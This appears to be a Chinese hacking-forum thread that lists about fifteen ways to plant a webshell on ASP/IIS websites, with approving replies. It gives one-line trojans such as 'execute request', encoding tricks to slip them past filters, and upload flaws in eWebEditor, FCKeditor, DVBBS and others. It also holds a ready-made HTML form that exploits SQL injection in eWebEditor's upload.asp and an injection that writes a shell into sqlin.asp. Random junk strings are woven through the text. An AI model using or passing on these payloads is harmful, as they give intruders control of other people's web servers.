返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式$ b( n; P* h9 r6 B) s% F

6 t' \* }7 b0 z0 L2 M8 W% S. H9 h& _2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
% w1 C% @+ L- w* F  f; m: p# C7 |2 T% R
3.上传漏洞:2 e# `: e: ]/ B
4 R/ K9 F- n9 c' Z: g
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00$ B! C. _9 \' }7 U8 ^+ I. T2 R

7 I& m; q/ ?2 C/ q+ P  z1 D9 J逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
: H1 V' n4 p/ A
% @) M2 p# `; L& C% o- ^4 `2 s# r' J雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp9 S  _7 w4 \5 f# |+ I
然后在上传文件里面填要传的图片格式的ASP木马
! @+ b, p) o8 |- I. w就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp6 \: n# x4 @4 P' x* i- F2 r
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传7 M/ M! e. ~8 x6 l; ?" f
( x$ q; H6 F" v3 p! G8 z* H
<html>! n; V% u9 T1 j+ Q, Q: `
<head>7 L  J; B# J" W4 }0 |: c5 ]+ V4 B
<title>ewebeditor upload.asp上传利用</title>: A6 z, _/ _3 d
</head>
. a8 ^  y- s5 j$ n<body>
  N- R% U( [. g4 |2 ~/ b<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">; G; v5 @' s* G0 @" {" S  {
<input type=file name=uploadfile size=100><br><br>
* E3 X3 D* x  R' O. u: |<input type=submit value=Fuck>6 R, G+ m1 ]2 V/ f( j* n
</form>
; A7 E5 |8 ~; X+ L/ B</body>" e- Q# J( N, ?" F2 b1 C: d  Z
</form>3 m7 |/ W/ ]0 a9 N7 K) ?" w( w
</html>' _' F& H! J0 p& f1 ?
( \: W7 t+ B+ j
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问2 K+ d# v+ @5 a  Q2 D
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
. U6 |# U$ W1 ~1 S+ _: Z, X- A7 k0 P9 W; ~! t3 o6 a
利用windows2003解析。建立zjq.asp的文件夹
" c+ Y+ f7 w+ P$ \8 s9 s
) j& M0 K+ ?0 \4 j  O" y( l6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
- T- g9 C1 z3 I, V, v" ~- `5 ~' X9 c; K/ f4 d5 O) w! a6 Z- j, G
7.cuteeditor:类似ewebeditor* X; v2 o! d9 {9 ^1 ^) R8 d

/ _) s1 \. s; i* V$ M2 a: p8.htmleditor:同上
. P# A# {* P3 G3 u/ S! N
9 u8 b& w- ?* l6 y/ V9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
5 [! P6 L- H! M$ [& \; I1 j
. S& H$ q- j- V3 N+ ?<%execute request("value")%><%'<% loop <%:%>
: N& Q6 w1 D+ b& Q. ~6 U" T6 v5 A# |% n" x
<%'<% loop <%:%><%execute request("value")%>* u. V9 ]1 B! _9 n( H

) n( }# t- z# |8 K<%execute request("value")'<% loop <%:%>
* U& l2 ~1 |# n5 x- S( d9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞1 ?2 A2 d4 M. }4 `; ^" q" t' x. e

6 |& d# q5 [1 l1 K. b$ ^10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
5 V* e) K/ u- N+ p( R
# L" y! L) n. Y; F1 ?) h" p/ A$ E; L; t3 y11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k38 U7 i1 j5 i2 \- Q
, y* M# D8 `4 R9 p7 |- `
解析漏洞得到webshell/ t; v+ s9 R2 w+ v. W8 c; x8 t
/ d- n& e- h! J  p4 G- Q, S( r
12.mssql差异备份,日志备份,前提需知道web路径
- P+ u4 ^6 F& S, F9 _! j% W5 G3 V1 m3 B: u* x: J5 ?
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell6 z/ V9 G' D2 G9 x) t8 ?) f: w! O

. S- ?! x# U+ U14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
# f) U. Y9 R1 ~2 u! Z9 H# B. B! c
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可0 w2 w+ o' C- C+ F/ w
/ [1 t$ k% Q8 L& k
以上只是本人的一些拙见,并不完善,以后想到了再继续添加9 V- B: G. ?/ h0 `3 {' d
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 ' G( Q5 Y+ R* }- g
5 z: T- h' |3 V+ {/ u1 f3 V

8 s5 s: u1 j# W9 c3 L! Q很好啊、基本的入侵方法都包含了
1 y7 ^! `9 o0 j& ~7 H/ L* c
# W, k5 _$ e; ~( m; a最好来个提权的帖子再。2 H$ N* E8 n# v

  H* |+ p1 Z/ D9 G9 E3 w: L不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表